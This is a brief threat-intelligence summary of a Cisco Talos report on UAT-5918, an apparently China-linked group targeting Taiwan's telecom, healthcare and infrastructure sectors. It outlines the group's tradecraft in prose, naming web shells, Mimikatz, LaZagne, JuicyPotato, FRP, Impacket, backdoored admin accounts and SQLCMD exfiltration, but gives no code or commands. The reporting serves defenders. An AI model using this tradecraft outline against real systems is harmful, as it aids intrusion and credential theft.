UAT-5918: China-Linked APT Targets Critical Infrastructure in Taiwan
TL;DR
Cisco Talos identified UAT-5918, a threat actor targeting Taiwan’s critical infrastructure using web shells and open-source tools. The group, linked to China, exploits unpatched servers for long-term access and credential theft. Their tactics overlap with other Chinese APT groups, including Volt Typhoon and Flax Typhoon.
UAT-5918: A New Threat to Taiwan’s Critical Infrastructure
Cisco Talos has uncovered a sophisticated information-stealing threat actor, UAT-5918, active since 2023. This group employs web shells and open-source tools to maintain persistence and carry out credential theft, primarily targeting Taiwan’s critical sectors.
Targeted Sectors and Tactics
UAT-5918 focuses on Taiwan’s telecom, healthcare, IT, and critical infrastructure sectors. The group exploits N-day vulnerabilities in unpatched servers to gain long-term access. Their post-compromise activities include:
- Reconnaissance and Credential Theft: Using open-source tools for network discovery and credential harvesting.
- Persistence: Deploying web shells across subdomains and creating admin accounts.
- Lateral Movement: Utilizing tools like Mimikatz, FRP, and Impacket for remote access and PowerShell remoting.
Links to Chinese APT Groups
Researchers have linked UAT-5918 to China due to overlaps in tactics, techniques, and procedures (TTPs) with multiple Chinese APT groups, including:
- Volt Typhoon: Known for living-off-the-land techniques and long-term access.
- Flax Typhoon: Uses legitimate software to quietly access Taiwanese organizations.
- Dalbit: Engages in targeted attacks against critical infrastructure.
The overlaps include the use of tools like FRP, Earthworm, and Impacket, as well as the absence of custom-made malware.
Unique Tooling and Persistence Mechanisms
UAT-5918 employs a mix of common and unique tools:
- FRP and Neo-reGeorg: For establishing reverse proxy tunnels.
- LaZagne, SNetCracker, and PortBrute: Tools not publicly linked to other groups, suggesting exclusive use.
- Web Shells and JuicyPotato: For deep deployment in system directories and privilege escalation.
Data Exfiltration and Long-Term Access
The group maintains persistent access by:
- Deploying ASP and PHP web shells.
- Using JuicyPotato for privilege escalation.
- Creating backdoored admin accounts.
- Stealing credentials via Mimikatz, LaZagne, and registry dumps.
- Pivoting within networks using RDP, Impacket, and brute-force tools.
- Exfiltrating data, including confidential files and database backups, using SQLCMD.
Indicators of Compromise (IOCs)
Talos researchers have published IOCs on their GitHub repository for further analysis and defense.
Conclusion
UAT-5918 represents a significant threat to Taiwan’s critical infrastructure, employing sophisticated tactics and tools to maintain long-term access. The overlaps with other Chinese APT groups highlight the need for enhanced cybersecurity measures to protect against such persistent threats.
Additional Resources
For further insights, check:
For more details, visit the full article: source